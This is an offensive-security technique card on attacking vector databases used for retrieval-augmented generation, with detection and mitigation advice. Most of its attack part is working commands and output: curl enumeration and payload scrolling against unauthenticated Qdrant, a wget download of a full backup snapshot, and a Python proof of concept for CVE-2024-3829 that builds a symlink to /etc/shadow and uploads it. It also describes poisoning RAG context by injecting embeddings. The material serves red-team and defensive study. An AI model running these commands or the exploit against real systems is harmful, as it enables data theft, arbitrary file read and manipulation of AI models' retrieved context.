INF-002: Vector Database Attacks
| Category | Infrastructure |
| Frameworks | ATLAS: Discover ML Artifacts |
Exploit vector database services that store embeddings for RAG. Snapshot, backup, and administrative endpoints often lack authentication.
Technique
# Qdrant common endpoints:
GET /collections # List all
GET /collections/{name} # Collection info
POST /collections/{name}/points/scroll
GET /snapshots # Backup files
# CVE-2024-3829 (Qdrant):
# Snapshot path traversal via symlinks
# Tar append mode preserves symlinks
# Upload crafted snapshot -> read any file
# ChromaDB:
# Often runs without auth on port 8000
# Full CRUD access to all embeddings
Key Concepts
- Vector databases are the backbone of RAG and often the least secured component. They store the embeddings that drive retrieval-augmented generation, making them both a data exfiltration target (read all the documents in the knowledge base) and a poisoning target (inject malicious embeddings that get retrieved as trusted context).
- Administrative and snapshot endpoints are frequently unauthenticated. Vector databases like Qdrant and ChromaDB are designed for developer convenience and default to open access. In production deployments, snapshot and backup endpoints often remain exposed, allowing full data extraction.
- CVE-2024-3829 demonstrates the snapshot attack surface. By crafting a tar file in append mode with symlinks, an attacker can upload a snapshot to Qdrant that, when processed, follows symlinks to read arbitrary files from the host filesystem.
- Collection enumeration reveals the organization's AI architecture. Listing collections exposes the knowledge domains, naming conventions, and data organization of the RAG system. This information enables targeted poisoning or retrieval hijacking attacks.
- Write access to vector databases enables silent RAG poisoning. If an attacker can insert or modify embeddings, they can plant content that gets retrieved in response to specific queries, effectively injecting instructions into the model's context without touching the model itself.
Detection
- Monitor vector database access logs for enumeration patterns. Sequential requests to list collections, scroll through points, or download snapshots from unexpected source IPs indicate reconnaissance or data exfiltration.
- Alert on snapshot upload or restore operations. In production environments, snapshot operations should be rare and expected. Unexpected snapshot uploads, especially from non-administrative sources, are a strong indicator of exploitation.
- Track embedding insertion and modification rates. Sudden spikes in write operations to specific collections, especially outside normal data ingestion windows, may indicate poisoning attempts.
Mitigation
- Enable authentication and network segmentation for all vector database instances. Never expose Qdrant, ChromaDB, or similar services directly to the internet or to untrusted network segments. Use API keys, mTLS, or proxy-layer authentication.
- Restrict snapshot and administrative endpoints to dedicated management interfaces. Separate the data plane (query/insert operations) from the control plane (snapshots, collection management) and apply stricter access controls to the control plane.
- Implement embedding integrity monitoring. Periodically verify that the embeddings in production collections match expected checksums or signatures, detecting unauthorized modifications that could indicate poisoning.
Example Output
Collection Enumeration
$ curl -s http://10.10.14.50:6333/collections | jq .
{
"result": {
"collections": [
{
"name": "documents"
},
{
"name": "internal_policies"
},
{
"name": "support_tickets"
}
]
},
"status": "ok",
"time": 0.000038
}
Three collections exposed without authentication. The internal_policies and support_tickets names suggest sensitive organizational data.
Extracting Embeddings and Metadata
$ curl -s -X POST http://10.10.14.50:6333/collections/documents/points/scroll \
-H 'Content-Type: application/json' \
-d '{"limit": 5, "with_payload": true, "with_vector": false}' | jq .
{
"result": {
"points": [
{
"id": 1001,
"payload": {
"text": "All API requests to the payments service must include the X-Internal-Auth header with the service account token. The production token is rotated quarterly and stored in Vault at secret/data/payments/api-key.",
"source": "infrastructure-runbook-2024.pdf",
"page": 14,
"department": "engineering",
"classification": "internal",
"indexed_at": "2024-08-15T09:22:11Z"
}
},
{
"id": 1002,
"payload": {
"text": "The staging environment database credentials are managed through the shared credential store. Access requires VPN connection and LDAP group membership in cn=db-admins,ou=groups,dc=corp,dc=local.",
"source": "onboarding-guide-engineering.docx",
"page": 7,
"department": "engineering",
"classification": "internal",
"indexed_at": "2024-08-15T09:22:14Z"
}
},
{
"id": 1003,
"payload": {
"text": "AWS access for the ML pipeline uses role arn:aws:iam::314159265358:role/ml-pipeline-prod with cross-account access to the data lake in account 271828182845. SageMaker endpoints are in us-east-1.",
"source": "ml-platform-architecture.pdf",
"page": 23,
"department": "data-science",
"classification": "confidential",
"indexed_at": "2024-08-16T14:05:33Z"
}
},
{
"id": 1004,
"payload": {
"text": "Incident response procedures require notification to security@corp.local within 15 minutes of a confirmed breach. The CISO's direct line is ext 4401. PagerDuty escalation policy ID: PSEC7X2.",
"source": "incident-response-plan-v3.pdf",
"page": 5,
"department": "security",
"classification": "internal",
"indexed_at": "2024-08-17T11:30:02Z"
}
},
{
"id": 1005,
"payload": {
"text": "The third-party vendor API integration for payment processing uses endpoint https://api.vendor-payments.com/v2/process with API key stored in environment variable VENDOR_PAY_KEY on the payments-gateway hosts.",
"source": "vendor-integration-specs.pdf",
"page": 31,
"department": "engineering",
"classification": "confidential",
"indexed_at": "2024-08-18T08:14:55Z"
}
}
],
"next_page_offset": 1006
},
"status": "ok",
"time": 0.003291
}
Five points from the documents collection reveal internal architecture details, AWS account IDs, IAM role ARNs, LDAP structure, incident response contacts, and vendor integration details. The next_page_offset field confirms there are more points to scroll through. The classification field shows that documents marked "confidential" were ingested alongside "internal" documents with no access control differentiation at the vector database layer.
Snapshot Enumeration
$ curl -s http://10.10.14.50:6333/collections/documents/snapshots | jq .
{
"result": [
{
"name": "documents-2024-09-01-backup.snapshot",
"creation_time": "2024-09-01T02:00:04Z",
"size": 248119296
},
{
"name": "documents-2024-09-08-backup.snapshot",
"creation_time": "2024-09-08T02:00:03Z",
"size": 251658240
}
],
"status": "ok",
"time": 0.000071
}
# Download a full snapshot for offline analysis
$ wget -q http://10.10.14.50:6333/collections/documents/snapshots/documents-2024-09-08-backup.snapshot
$ ls -lh documents-2024-09-08-backup.snapshot
-rw-r--r-- 1 kali kali 240M Sep 14 09:41 documents-2024-09-08-backup.snapshot
The snapshot contains the full collection data, all embeddings, payloads, and metadata, downloadable as a single file. This is a complete exfiltration of the RAG knowledge base.
CVE-2024-3829: Snapshot Path Traversal
CVE-2024-3829 enables arbitrary file read on the Qdrant host by uploading a crafted snapshot containing symlinks. The critical detail: the tar file must use append mode (mode="a"), not write mode. A symlink placed at the WAL path (0/wal/sneaky) survives the snapshot restore cycle and resolves to the target file on the host filesystem.
# Create a crafted snapshot with a symlink pointing to /etc/shadow
$ python3 -c "
import tarfile, io
with tarfile.open('evil.snapshot', 'a') as tar:
info = tarfile.TarInfo(name='0/wal/sneaky')
info.type = tarfile.SYMTYPE
info.linkname = '/etc/shadow'
tar.addfile(info)
"
# Upload the crafted snapshot
$ curl -s -X POST http://10.10.14.50:6333/collections/documents/snapshots/upload \
-H 'Content-Type: multipart/form-data' \
-F 'snapshot=@evil.snapshot'
{
"result": true,
"status": "ok",
"time": 0.412835
}
After the snapshot is restored, the symlink resolves through the Qdrant storage directory, and the target file contents can be retrieved through the collection's storage paths. This was patched in Qdrant v1.9.2.